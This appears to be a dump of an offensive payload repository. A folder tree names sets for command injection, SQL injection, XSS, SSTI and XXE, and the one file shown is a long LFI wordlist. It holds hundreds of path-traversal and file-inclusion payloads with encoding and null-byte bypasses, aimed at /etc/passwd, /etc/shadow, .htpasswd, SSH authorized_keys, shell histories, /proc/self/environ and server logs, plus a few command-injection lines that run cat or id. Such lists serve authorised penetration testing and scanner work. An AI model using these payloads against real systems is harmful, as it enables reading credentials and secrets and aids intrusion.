├── Command injection ├── base64_encoded.txt ├── command_injection.txt ├── hex_encoded.txt ├── unicode_encoded.txt └── url_encoded.txt ├── LFI └── lfi.txt ├── README.md ├── SSTI ├── base64_encoded.txt ├── hex_encoded.txt ├── ssti.txt ├── unicode_encoded.txt └── url_encoded.txt ├── Sql injection ├── SQL payload .txt ├── base64_encoded.txt ├── hex_encoded.txt ├── unicode_encoded.txt └── url_encoded.txt ├── XSS ├── base64_encoded.txt ├── hex_encoded.txt ├── unicode_encoded.txt ├── url_encoded.txt └── xss.txt └── XXE ├── base64_encoded.txt ├── hex_encoded.txt ├── unicode_encoded.txt ├── url_encoded.txt └── xxe.txt /LFI/lfi.txt: -------------------------------------------------------------------------------- 1 | /???/??ss?? 2 | /e't'c/p'a's's'w'd' 3 | /e'tc'/pa'ss'wd 4 | /e'tc'/pa'ss'wd 5 | 6 | %00../../../../../../etc/passwd 7 | %00/etc/passwd%00 8 | %00../../../../../../etc/shadow 9 | %00/etc/shadow%00 10 | %0a/bin/cat%20/etc/passwd 11 | %0a/bin/cat%20/etc/shadow 12 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 13 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 14 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 15 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini 16 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini 17 | /../../../../../../../../%2A 18 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini 19 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 20 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow 21 | %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd 22 | %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/shadow 23 | ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 24 | ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow 25 | ..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed 26 | ..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd 27 | ..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow 28 | =3D “/..” . “%2f.. 29 | ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini 30 | admin/access_log 31 | /admin/install.php 32 | ../../../administrator/inbox 33 | /apache2/logs/access_log 34 | /apache2/logs/access.log 35 | /apache2/logs/error_log 36 | /apache2/logs/error.log 37 | /apache/logs/access_log 38 | /apache/logs/access.log 39 | ../../../../../apache/logs/access.log 40 | ../../../../apache/logs/access.log 41 | ../../../apache/logs/access.log 42 | ../../apache/logs/access.log 43 | ../apache/logs/access.log 44 | /apache/logs/error_log 45 | /apache/logs/error.log 46 | ../../../../../apache/logs/error.log 47 | ../../../../apache/logs/error.log 48 | ../../../apache/logs/error.log 49 | ../../apache/logs/error.log 50 | ../apache/logs/error.log 51 | /apache\php\php.ini 52 | \\'/bin/cat%20/etc/passwd\\' 53 | \\'/bin/cat%20/etc/shadow\\' 54 | /.bash_history 55 | /.bash_profile 56 | /.bashrc 57 | /../../../../../../../../bin/id| 58 | /bin/php.ini 59 | /boot/grub/grub.conf 60 | /./././././././././././boot.ini 61 | /../../../../../../../../../../../boot.ini 62 | /..\../..\../..\../..\../..\../..\../boot.ini 63 | /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini 64 | ..//..//..//..//..//boot.ini 65 | ../../../../../../../../../../../../boot.ini 66 | ../../boot.ini 67 | ..\../..\../..\../..\../boot.ini 68 | ..\../..\../boot.ini 69 | ..\..\..\..\..\..\..\..\..\..\boot.ini 70 | \..\..\..\..\..\..\..\..\..\..\boot.ini 71 | /../../../../../../../../../../../boot.ini%00 72 | ../../../../../../../../../../../../boot.ini%00 73 | ..\..\..\..\..\..\..\..\..\..\boot.ini%00 74 | /../../../../../../../../../../../boot.ini%00.html 75 | /../../../../../../../../../../../boot.ini%00.jpg 76 | /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 77 | ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini 78 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd 79 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow 80 | c:\apache\logs\access.log 81 | c:\apache\logs\error.log 82 | c:\AppServ\MySQL 83 | C:/boot.ini 84 | C:\boot.ini 85 | /C:/inetpub/ftproot/ 86 | C:/inetpub/wwwroot/global.asa 87 | C:\inetpub\wwwroot\global.asa 88 | c:\inetpub\wwwroot\index.asp 89 | /config.asp 90 | ../config.asp 91 | config.asp 92 | ../config.inc.php 93 | config.inc.php 94 | ../config.js 95 | config.js 96 | _config.php 97 | ../_config.php 98 | ../config.php 99 | config.php 100 | ../_config.php%00 101 | ../../../../../../../../conf/server.xml 102 | /core/config.php 103 | /C:\Program Files\ 104 | c:\Program Files\Apache Group\Apache\logs\access.log 105 | c:\Program Files\Apache Group\Apache\logs\error.log 106 | /.cshrc 107 | c:\System32\Inetsrv\metabase.xml 108 | c:WINDOWS/system32/ 109 | d:\AppServ\MySQL 110 | database.asp 111 | database.js 112 | database.php 113 | data.php 114 | dbase.php a 115 | db.php 116 | ../../../../../../../dev 117 | /D:\Program Files\ 118 | d:\System32\Inetsrv\metabase.xml 119 | /etc/apache2/apache2.conf 120 | /etc/apache2/conf/httpd.conf 121 | /etc/apache2/httpd.conf 122 | /etc/apache2/sites-available/default 123 | /etc/apache2/vhosts.d/default_vhost.include 124 | /etc/apache/apache.conf 125 | /etc/apache/conf/httpd.conf 126 | /etc/apache/httpd.conf 127 | /etc/apt/sources.list 128 | /etc/chrootUsers 129 | /etc/crontab 130 | /etc/defaultdomain 131 | /etc/default/passwd 132 | /etc/defaultrouter 133 | /etc/fstab 134 | /etc/ftpchroot 135 | /etc/ftphosts 136 | /etc/group 137 | /etc/hostname.bge 138 | /etc/hostname.ce0 139 | /etc/hostname.ce1 140 | /etc/hostname.ce2 141 | /etc/hostname.ce3 142 | /etc/hostname.dcelx0 143 | /etc/hostname.dcelx1 144 | /etc/hostname.dcelx2 145 | /etc/hostname.dcelx3 146 | /etc/hostname.dmfe0 147 | /etc/hostname.dmfe1 148 | /etc/hostname.dmfe2 149 | /etc/hostname.dmfe3 150 | /etc/hostname.dnet0 151 | /etc/hostname.dnet1 152 | /etc/hostname.dnet2 153 | /etc/hostname.dnet3 154 | /etc/hostname.ecn0 155 | /etc/hostname.ecn1 156 | /etc/hostname.ecn2 157 | /etc/hostname.ecn3 158 | /etc/hostname.elx0 159 | /etc/hostname.elx1 160 | /etc/hostname.elx2 161 | /etc/hostname.elx3 162 | /etc/hostname.elxl0 163 | /etc/hostname.elxl1 164 | /etc/hostname.elxl2 165 | /etc/hostname.elxl3 166 | /etc/hostname.eri0 167 | /etc/hostname.eri1 168 | /etc/hostname.eri2 169 | /etc/hostname.eri3 170 | /etc/hostname.ge0 171 | /etc/hostname.ge1 172 | /etc/hostname.ge2 173 | /etc/hostname.ge3 174 | /etc/hostname.hme0 175 | /etc/hostname.hme1 176 | /etc/hostname.hme2 177 | /etc/hostname.hme3 178 | /etc/hostname.ieef0 179 | /etc/hostname.ieef1 180 | /etc/hostname.ieef2 181 | /etc/hostname.ieef3 182 | /etc/hostname.iprb0 183 | /etc/hostname.iprb1 184 | /etc/hostname.iprb2 185 | /etc/hostname.iprb3 186 | /etc/hostname.le0 187 | /etc/hostname.le1 188 | /etc/hostname.le2 189 | /etc/hostname.le3 190 | /etc/hostname.lo 191 | /etc/hostname.pcn0 192 | /etc/hostname.pcn1 193 | /etc/hostname.pcn2 194 | /etc/hostname.pcn3 195 | /etc/hostname.qfe0 196 | /etc/hostname.qfe1 197 | /etc/hostname.qfe2 198 | /etc/hostname.qfe3 199 | /etc/hostname.spwr0 200 | /etc/hostname.spwr1 201 | /etc/hostname.spwr2 202 | /etc/hostname.spwr3 203 | /etc/hosts 204 | ../../../../../../../../../../../../etc/hosts 205 | ../../../../../../../../../../../../etc/hosts%00 206 | /etc/hosts.allow 207 | /etc/hosts.deny 208 | /etc/hosts.equiv 209 | /etc/http/conf/httpd.conf 210 | /etc/httpd.conf 211 | /etc/httpd/conf.d/php.conf 212 | /etc/httpd/conf.d/squirrelmail.conf 213 | /etc/httpd/conf.d/ssl.conf 214 | /etc/httpd/conf/httpd.conf 215 | /etc/httpd/httpd.conf 216 | /etc/httpd/logs/acces_log 217 | /etc/httpd/logs/acces.log 218 | ../../../../../../../etc/httpd/logs/acces_log 219 | ../../../../../../../etc/httpd/logs/acces.log 220 | /etc/httpd/logs/access_log 221 | /etc/httpd/logs/access.log 222 | ../../../../../etc/httpd/logs/access_log 223 | ../../../../../etc/httpd/logs/access.log 224 | /etc/httpd/logs/error_log 225 | /etc/httpd/logs/error.log 226 | ../../../../../../../etc/httpd/logs/error_log 227 | ../../../../../../../etc/httpd/logs/error.log 228 | ../../../../../etc/httpd/logs/error_log 229 | ../../../../../etc/httpd/logs/error.log 230 | /etc/httpd/php.ini 231 | /etc/http/httpd.conf 232 | /etc/inetd.conf 233 | /etc/init.d/apache 234 | /etc/init.d/apache2 235 | /etc/issue 236 | /etc/logrotate.d/ftp 237 | /etc/logrotate.d/httpd 238 | /etc/logrotate.d/proftpd 239 | /etc/logrotate.d/vsftpd.log 240 | /etc/mail/access 241 | /etc/mailman/mm_cfg.py 242 | /etc/make.conf 243 | /etc/master.passwd 244 | /etc/motd 245 | /etc/my.cnf 246 | /etc/mysql/my.cnf 247 | /etc/netconfig 248 | /etc/nsswitch.conf 249 | /etc/opt/ipf/ipf.conf 250 | /etc/opt/ipf/ipnat.conf 251 | /./././././././././././etc/passwd 252 | /../../../../../../../../../../etc/passwd 253 | /../../../../../../../../../../etc/passwd^^ 254 | /..\../..\../..\../..\../..\../..\../etc/passwd 255 | /etc/passwd 256 | ../../../../../../../../../../../../../../../../../../../../../../etc/passwd 257 | ../../../../../../../../../../../../../../../../../../../../../etc/passwd 258 | ../../../../../../../../../../../../../../../../../../../../etc/passwd 259 | ../../../../../../../../../../../../../../../../../../../etc/passwd 260 | ../../../../../../../../../../../../../../../../../../etc/passwd 261 | ../../../../../../../../../../../../../../../../../etc/passwd 262 | ../../../../../../../../../../../../../../../../etc/passwd 263 | ../../../../../../../../../../../../../../../etc/passwd 264 | ../../../../../../../../../../../../../../etc/passwd 265 | ../../../../../../../../../../../../../etc/passwd 266 | ../../../../../../../../../../../../etc/passwd 267 | ../../../../../../../../../../../etc/passwd 268 | ../../../../../../../../../../etc/passwd 269 | ../../../../../../../../../etc/passwd 270 | ../../../../../../../../etc/passwd 271 | ../../../../../../../etc/passwd 272 | ../../../../../../etc/passwd 273 | ../../../../../etc/passwd 274 | ../../../../etc/passwd 275 | ../../../etc/passwd 276 | ../../etc/passwd 277 | ../etc/passwd 278 | ..\..\..\..\..\..\..\..\..\..\etc\passwd 279 | .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 280 | \..\..\..\..\..\..\..\..\..\..\etc\passwd 281 | etc/passwd 282 | /etc/passwd%00 283 | ../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 284 | ../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 285 | ../../../../../../../../../../../../../../../../../../../../etc/passwd%00 286 | ../../../../../../../../../../../../../../../../../../../etc/passwd%00 287 | ../../../../../../../../../../../../../../../../../../etc/passwd%00 288 | ../../../../../../../../../../../../../../../../../etc/passwd%00 289 | ../../../../../../../../../../../../../../../../etc/passwd%00 290 | ../../../../../../../../../../../../../../../etc/passwd%00 291 | ../../../../../../../../../../../../../../etc/passwd%00 292 | ../../../../../../../../../../../../../etc/passwd%00 293 | ../../../../../../../../../../../../etc/passwd%00 294 | ../../../../../../../../../../../etc/passwd%00 295 | ../../../../../../../../../../etc/passwd%00 296 | ../../../../../../../../../etc/passwd%00 297 | ../../../../../../../../etc/passwd%00 298 | ../../../../../../../etc/passwd%00 299 | ../../../../../../etc/passwd%00 300 | ../../../../../etc/passwd%00 301 | ../../../../etc/passwd%00 302 | ../../../etc/passwd%00 303 | ../../etc/passwd%00 304 | ../etc/passwd%00 305 | ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 306 | \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 307 | /../../../../../../../../../../../etc/passwd%00.html 308 | /../../../../../../../../../../../etc/passwd%00.jpg 309 | ../../../../../../etc/passwd&=%3C%3C%3C%3C 310 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 311 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 312 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 313 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 314 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 315 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 316 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 317 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 318 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 319 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 320 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 321 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 322 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 323 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 324 | ....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 325 | ....\/....\/....\/....\/....\/....\/....\/etc/passwd 326 | ....\/....\/....\/....\/....\/....\/etc/passwd 327 | ....\/....\/....\/....\/....\/etc/passwd 328 | ....\/....\/....\/....\/etc/passwd 329 | ....\/....\/....\/etc/passwd 330 | ....\/....\/etc/passwd 331 | ....\/etc/passwd 332 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 333 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 334 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 335 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 336 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 337 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 338 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 339 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 340 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 341 | ....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 342 | ....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 343 | ....//....//....//....//....//....//....//....//....//....//....//etc/passwd 344 | ....//....//....//....//....//....//....//....//....//....//etc/passwd 345 | ....//....//....//....//....//....//....//....//....//etc/passwd 346 | ....//....//....//....//....//....//....//....//etc/passwd 347 | ....//....//....//....//....//....//....//etc/passwd 348 | ....//....//....//....//....//....//etc/passwd 349 | ....//....//....//....//....//etc/passwd 350 | ....//....//....//....//etc/passwd 351 | ....//....//....//etc/passwd 352 | ....//....//etc/passwd 353 | ....//etc/passwd 354 | /etc/php4.4/fcgi/php.ini 355 | /etc/php4/apache2/php.ini 356 | /etc/php4/apache/php.ini 357 | /etc/php4/cgi/php.ini 358 | /etc/php5/apache2/php.ini 359 | /etc/php5/apache/php.ini 360 | /etc/php5/cgi/php.ini 361 | /etc/php/apache2/php.ini 362 | /etc/php/apache/php.ini 363 | /etc/php/cgi/php.ini 364 | /etc/php.d/dom.ini 365 | /etc/php.d/gd.ini 366 | /etc/php.d/imap.ini 367 | /etc/php.d/json.ini 368 | /etc/php.d/ldap.ini 369 | /etc/php.d/mbstring.ini 370 | /etc/php.d/mysqli.ini 371 | /etc/php.d/mysql.ini 372 | /etc/php.d/odbc.ini 373 | /etc/php.d/pdo.ini 374 | /etc/php.d/pdo_mysql.ini 375 | /etc/php.d/pdo_odbc.ini 376 | /etc/php.d/pdo_pgsql.ini 377 | /etc/php.d/pdo_sqlite.ini 378 | /etc/php.d/pgsql.ini 379 | /etc/php.d/xmlreader.ini 380 | /etc/php.d/xmlwriter.ini 381 | /etc/php.d/xsl.ini 382 | /etc/php.d/zip.ini 383 | /etc/php.ini 384 | /etc/php/php4/php.ini 385 | /etc/php/php.ini 386 | /etc/postfix/mydomains 387 | /etc/proftp.conf 388 | /etc/proftpd/modules.conf 389 | /etc/protpd/proftpd.conf 390 | /etc/pure-ftpd.conf 391 | /etc/pureftpd.passwd 392 | /etc/pureftpd.pdb 393 | /etc/pure-ftpd/pure-ftpd.conf 394 | /etc/pure-ftpd/pure-ftpd.pdb 395 | /etc/pure-ftpd/pureftpd.pdb 396 | /etc/release 397 | /etc/resolv.conf 398 | /etc/rpc 399 | /etc/security/environ 400 | /etc/security/failedlogin 401 | /etc/security/group 402 | /etc/security/lastlog 403 | /etc/security/limits 404 | /etc/security/passwd 405 | /etc/security/user 406 | /./././././././././././etc/shadow 407 | /../../../../../../../../../../etc/shadow 408 | /../../../../../../../../../../etc/shadow^^ 409 | /..\../..\../..\../..\../..\../..\../etc/shadow 410 | /etc/shadow 411 | ../../../../../../../../../../../../etc/shadow 412 | ..\..\..\..\..\..\..\..\..\..\etc\shadow 413 | .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow 414 | \..\..\..\..\..\..\..\..\..\..\etc\shadow 415 | ../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00 416 | ../../../../../../../../../../../../etc/shadow%00 417 | ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 418 | \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 419 | etc/shadow%00 420 | /etc/ssh/sshd_config 421 | /etc/sudoers 422 | /etc/syslog.conf 423 | /etc/syslogd.conf 424 | /etc/system 425 | /etc/updatedb.conf 426 | /etc/utmp 427 | /etc/vfstab 428 | /etc/vhcs2/proftpd/proftpd.conf 429 | /etc/vsftpd.chroot_list 430 | /etc/vsftpd.conf 431 | /etc/vsftpd/vsftpd.conf 432 | /etc/wtmp 433 | /etc/wu-ftpd/ftpaccess 434 | /etc/wu-ftpd/ftphosts 435 | /etc/wu-ftpd/ftpusers 436 | /.forward 437 | /home2\bin\stable\apache\php.ini 438 | /home/apache/conf/httpd.conf 439 | /home/apache/httpd.conf 440 | /home\bin\stable\apache\php.ini 441 | /.htpasswd 442 | .htpasswd 443 | ../.htpasswd 444 | ../install.php 445 | install.php 446 | ../../../../../../../../../../../../localstart.asp 447 | ../../../../../../../../../../../../localstart.asp%00 448 | /log/miscDir/accesslog 449 | /.logout 450 | /logs/access_log 451 | /logs/access.log 452 | ../../../../../logs/access.log 453 | ../../../../logs/access.log 454 | ../../../logs/access.log 455 | ../../logs/access.log 456 | ../logs/access.log 457 | /logs/error_log 458 | /logs/error.log 459 | ../../../../../logs/error.log 460 | ../../../../logs/error.log 461 | ../../../logs/error.log 462 | ../../logs/error.log 463 | ../logs/error.log 464 | /logs/pure-ftpd.log 465 | /master.passwd 466 | member/.htpasswd 467 | members/.htpasswd 468 | /.netrc 469 | /NetServer\bin\stable\apache\php.ini 470 | /opt/apache2/conf/httpd.conf 471 | /opt/apache/conf/httpd.conf 472 | /opt/lampp/logs/access_log 473 | /opt/lampp/logs/access.log 474 | /opt/lampp/logs/error_log 475 | /opt/lampp/logs/error.log 476 | /opt/xampp/etc/php.ini 477 | /opt/xampp/logs/access_log 478 | /opt/xampp/logs/access.log 479 | /opt/xampp/logs/error_log 480 | /opt/xampp/logs/error.log 481 | .pass 482 | ../.pass 483 | pass.dat 484 | passwd 485 | /.passwd 486 | .passwd 487 | ../.passwd 488 | passwd.dat 489 | /php4\php.ini 490 | /php5\php.ini 491 | /php\php.ini 492 | /PHP\php.ini 493 | /private/etc/httpd/httpd.conf 494 | /private/etc/httpd/httpd.conf.default 495 | /proc/cpuinfo 496 | /proc/interrupts 497 | /proc/loadavg 498 | /proc/meminfo 499 | /proc/mounts 500 | /proc/net/arp 501 | /proc/net/dev 502 | /proc/net/route 503 | /proc/net/tcp 504 | /proc/partitions 505 | /proc/self/cmdline 506 | /proc/self/environ 507 | /proc/self/status 508 | /proc/version 509 | /.profile 510 | /Program Files\Apache Group\Apache2\conf\httpd.conf 511 | /Program Files\Apache Group\Apache\conf\httpd.conf 512 | /Program Files\Apache Group\Apache\logs\access.log 513 | /Program Files\Apache Group\Apache\logs\error.log 514 | /Program Files\xampp\apache\conf\httpd.conf 515 | /../../../../pswd 516 | /.rhosts 517 | /root/.bash_history 518 | /root/.bash_logut 519 | root/.htpasswd 520 | /root/.ksh_history 521 | /root/.Xauthority 522 | /.sh_history 523 | /.shosts 524 | /.ssh/authorized_keys 525 | user/.htpasswd 526 | ../users.db.php 527 | users.db.php 528 | users/.htpasswd 529 | /usr/apache2/conf/httpd.conf 530 | /usr/apache/conf/httpd.conf 531 | /usr/etc/pure-ftpd.conf 532 | /usr/lib/cron/log 533 | /usr/lib/php.ini 534 | /usr/lib/php/php.ini 535 | /usr/lib/security/mkuser.default 536 | /usr/local/apache2/conf/httpd.conf 537 | /usr/local/apache2/httpd.conf 538 | /usr/local/apache2/logs/access_log 539 | /usr/local/apache2/logs/access.log 540 | /usr/local/apache2/logs/error_log 541 | /usr/local/apache2/logs/error.log 542 | /usr/local/apache/conf/httpd.conf 543 | /usr/local/apache/conf/php.ini 544 | /usr/local/apache/httpd.conf 545 | /usr/local/apache/log 546 | /usr/local/apache/logs 547 | /usr/local/apache/logs/access_log 548 | /usr/local/apache/logs/access_ log 549 | /usr/local/apache/logs/access.log 550 | /usr/local/apache/logs/access. log 551 | ../../../../../../../usr/local/apache/logs/access_ log 552 | ../../../../../../../usr/local/apache/logs/access. log 553 | ../../../../../usr/local/apache/logs/access_log 554 | ../../../../../usr/local/apache/logs/access.log 555 | /usr/local/apache/logs/error_log 556 | /usr/local/apache/logs/error.log 557 | ../../../../../../../usr/local/apache/logs/error_l og 558 | ../../../../../../../usr/local/apache/logs/error.l og 559 | ../../../../../usr/local/apache/logs/error_log 560 | ../../../../../usr/local/apache/logs/error.log 561 | /usr/local/apps/apache2/conf/httpd.conf 562 | /usr/local/apps/apache/conf/httpd.conf 563 | /usr/local/cpanel/logs 564 | /usr/local/cpanel/logs/access_log 565 | /usr/local/cpanel/logs/error_log 566 | /usr/local/cpanel/logs/license_log 567 | /usr/local/cpanel/logs/login_log 568 | /usr/local/cpanel/logs/stats_log 569 | /usr/local/etc/apache2/conf/httpd.conf 570 | /usr/local/etc/apache/conf/httpd.conf 571 | /usr/local/etc/apache/vhosts.conf 572 | /usr/local/etc/httpd/conf/httpd.conf 573 | /usr/local/etc/httpd/logs/access_log 574 | /usr/local/etc/httpd/logs/error_log 575 | /usr/local/etc/php.ini 576 | /usr/local/etc/pure-ftpd.conf 577 | /usr/local/etc/pureftpd.pdb 578 | /usr/local/httpd/conf/httpd.conf 579 | /usr/local/lib/php.ini 580 | /usr/local/php4/httpd.conf 581 | /usr/local/php4/httpd.conf.php 582 | /usr/local/php4/lib/php.ini 583 | /usr/local/php5/httpd.conf 584 | /usr/local/php5/httpd.conf.php 585 | /usr/local/php5/lib/php.ini 586 | /usr/local/php/httpd.conf 587 | /usr/local/php/httpd.conf.php 588 | /usr/local/php/lib/php.ini 589 | /usr/local/pureftpd/etc/pure-ftpd.conf 590 | /usr/local/pureftpd/etc/pureftpd.pdb 591 | /usr/local/pureftpd/sbin/pure-config.pl 592 | /usr/local/www/logs/thttpd_log 593 | /usr/local/Zend/etc/php.ini 594 | /usr/pkgsrc/net/pureftpd/ 595 | /usr/ports/contrib/pure-ftpd/ 596 | /usr/ports/ftp/pure-ftpd/ 597 | /usr/ports/net/pure-ftpd/ 598 | /usr/sbin/pure-config.pl 599 | /usr/spool/lp/log 600 | /usr/spool/mqueue/syslog 601 | /var/adm 602 | /var/adm/acct/sum/loginlog 603 | /var/adm/aculog 604 | /var/adm/aculogs 605 | /var/adm/crash/unix 606 | /var/adm/crash/vmcore 607 | /var/adm/cron/log 608 | /var/adm/dtmp 609 | /var/adm/lastlog 610 | /var/adm/lastlog/username 611 | /var/adm/log/asppp.log 612 | /var/adm/loginlog 613 | /var/adm/log/xferlog 614 | /var/adm/lp/lpd-errs 615 | /var/adm/messages 616 | /var/adm/pacct 617 | /var/adm/qacct 618 | /var/adm/ras/bootlog 619 | /var/adm/ras/errlog 620 | /var/adm/sulog 621 | /var/adm/SYSLOG 622 | /var/adm/utmp 623 | /var/adm/utmpx 624 | /var/adm/vold.log 625 | /var/adm/wtmp 626 | /var/adm/wtmpx 627 | /var/adm/X0msgs 628 | /var/apache/log 629 | /var/apache/logs 630 | /var/apache/logs/access_log 631 | /var/apache/logs/error_log 632 | /var/cpanel/cpanel.config 633 | /var/cron/log 634 | /var/lib/mlocate/mlocate.db 635 | /var/lib/mysql/my.cnf 636 | /var/local/www/conf/php.ini 637 | /var/lock/samba 638 | /var/log 639 | /var/log/access_log 640 | /var/log/access.log 641 | ../../../../../../../var/log/access_log 642 | ../../../../../../../var/log/access.log 643 | ../../../../../var/log/access_log 644 | /var/log/acct 645 | /var/log/apache2/access_log 646 | /var/log/apache2/access.log 647 | ../../../../../../../var/log/apache2/access_log 648 | ../../../../../../../var/log/apache2/access.log 649 | /var/log/apache2/error_log 650 | /var/log/apache2/error.log 651 | ../../../../../../../var/log/apache2/error_log 652 | ../../../../../../../var/log/apache2/error.log 653 | /var/log/apache/access_log 654 | /var/log/apache/access.log 655 | ../../../../../../../var/log/apache/access_log 656 | ../../../../../../../var/log/apache/access.log 657 | ../../../../../var/log/apache/access_log 658 | ../../../../../var/log/apache/access.log 659 | /var/log/apache/error_log 660 | /var/log/apache/error.log 661 | ../../../../../../../var/log/apache/error_log 662 | ../../../../../../../var/log/apache/error.log 663 | ../../../../../var/log/apache/error_log 664 | ../../../../../var/log/apache/error.log 665 | /var/log/apache-ssl/access.log 666 | /var/log/apache-ssl/error.log 667 | /var/log/auth 668 | /var/log/authlog 669 | /var/log/auth.log 670 | /var/log/boot.log 671 | /var/log/cron.log 672 | /var/log/dmesg 673 | /var/log/error_log 674 | /var/log/error.log 675 | ../../../../../../../var/log/error_log 676 | ../../../../../../../var/log/error.log 677 | ../../../../../var/log/error_log 678 | /var/log/exim_mainlog 679 | /var/log/exim/mainlog 680 | /var/log/exim_paniclog 681 | /var/log/exim/paniclog 682 | /var/log/exim_rejectlog 683 | /var/log/exim/rejectlog 684 | /var/log/ftplog 685 | /var/log/ftp-proxy 686 | /var/log/ftp-proxy/ftp-proxy.log 687 | /var/log/httpd/ 688 | /var/log/httpd/access_log 689 | /var/log/httpd/access.log 690 | ../../../../../var/log/httpd/access_log 691 | /var/log/httpd/error_log 692 | /var/log/httpd/error.log 693 | ../../../../../var/log/httpd/error_log 694 | /var/log/httpsd/ssl.access_log 695 | /var/log/httpsd/ssl_log 696 | /var/log/kern.log 697 | /var/log/lastlog 698 | /var/log/lighttpd 699 | /var/log/maillog 700 | /var/log/message 701 | /var/log/messages 702 | /var/log/mysqlderror.log 703 | /var/log/mysqld.log 704 | /var/log/mysql.log 705 | /var/log/mysql/mysql-bin.log 706 | /var/log/mysql/mysql.log 707 | /var/log/mysql/mysql-slow.log 708 | /var/log/ncftpd.errs 709 | /var/log/ncftpd/misclog.txt 710 | /var/log/news 711 | /var/log/news.all 712 | /var/log/news/news 713 | /var/log/news/news.all 714 | /var/log/news/news.crit 715 | /var/log/news/news.err 716 | /var/log/news/news.notice 717 | /var/log/news/suck.err 718 | /var/log/news/suck.notice 719 | /var/log/poplog 720 | /var/log/POPlog 721 | /var/log/proftpd 722 | 